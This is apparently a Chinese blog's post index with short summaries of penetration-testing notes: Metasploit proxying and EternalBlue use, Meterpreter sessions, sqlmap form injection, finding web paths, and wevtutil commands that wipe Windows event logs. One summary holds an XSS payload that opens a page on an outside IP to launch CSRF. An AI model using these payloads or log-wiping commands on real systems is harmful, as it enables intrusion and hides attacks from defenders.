posted @ 2021-06-29 09:18 孤单光量子 阅读(45) 评论(0) 推荐(0) 编辑
摘要:
模拟 multipart/form-data 形式的 form 上传文件 curl -F "filename=@/home/test/file.tar.gz" http://localhost/action.php 获取web服务器支持的方法 -i 显示响应中的http头 还包含报文中的内容 -X 阅读全文
摘要:
将msf代理到内网中,使用命令 1 setg Proxies socks5:你的socksIP:端口 MSF 扫描到的资产或者漏洞保存在数据库,方便我们梳理,常用的就是这两个语句: services 查看扫描到的资产IP及端口 vulns 查看扫描到的漏洞资产 关于永恒之蓝的利用 如果目标操作系统是 阅读全文
posted @ 2021-06-26 15:47 孤单光量子 阅读(357) 评论(0) 推荐(0) 编辑
摘要:
命令:wevtutil cl 日志类型 wevtutil cl security wevtutil cl Setup wevtutil cl System wevtutil cl Aplication wevtutil cl Forwarded Events 使用Phantom 工具 该脚本遍历事件 阅读全文
posted @ 2021-06-25 21:54 孤单光量子 阅读(64) 评论(0) 推荐(0) 编辑
摘要:
寻找web的路径 ( 1 ) 文件查找法 linux: find / -name index.php find / -name index.* windows: for /r d:/ %i in (index.php) do @echo %i for /r d:/ %i in (index.*) d 阅读全文
posted @ 2021-06-23 22:41 孤单光量子 阅读(637) 评论(0) 推荐(0) 编辑
摘要:
exploit-z 表示在完成 exploit 之后不会与会话进行交互。完成 exploit 之后,可以使用 sessions 查看会话信息。 session -u ID 将shell转变为meterpreter db_nmap -sT -sV 192.168.0.103 -p 1433 扫描目标 阅读全文
posted @ 2021-06-23 22:05 孤单光量子 阅读(96) 评论(0) 推荐(0) 编辑
摘要:
文件描述符可以理解为linux跟踪打开文件,而分配的一个数字,这个数字有点类似c语言操作文件时候的句柄,通过句柄就可以实现文件的读写操作。 当Linux启动的时候会默认打开三个文件描述符,分别是: 标准输入 standard input 0 (默认设备键盘)标准输出 standard output 阅读全文
posted @ 2020-09-03 09:17 孤单光量子 阅读(234) 评论(0) 推荐(0) 编辑
摘要:
<script src="x" onerror=javascript:window.open("http://192.168.38.1/csrf.html")></script> 阅读全文
posted @ 2020-08-16 18:47 孤单光量子 阅读(145) 评论(0) 推荐(0) 编辑
摘要:
对于一个页面的form表单中的数据进行注入测试 方法有三个 ①burp抓包 将数据储存为文本文件 然后 sqlmap中使用 -r 参数进行测试 ②使用 --data参数,将数据进行测试 ③直接使用--forms参数,sqlmap会自动从-u中的url获取页面中的表单进行测试。 阅读全文
posted @ 2020-07-27 08:48 孤单光量子 阅读(1962) 评论(0) 推荐(1) 编辑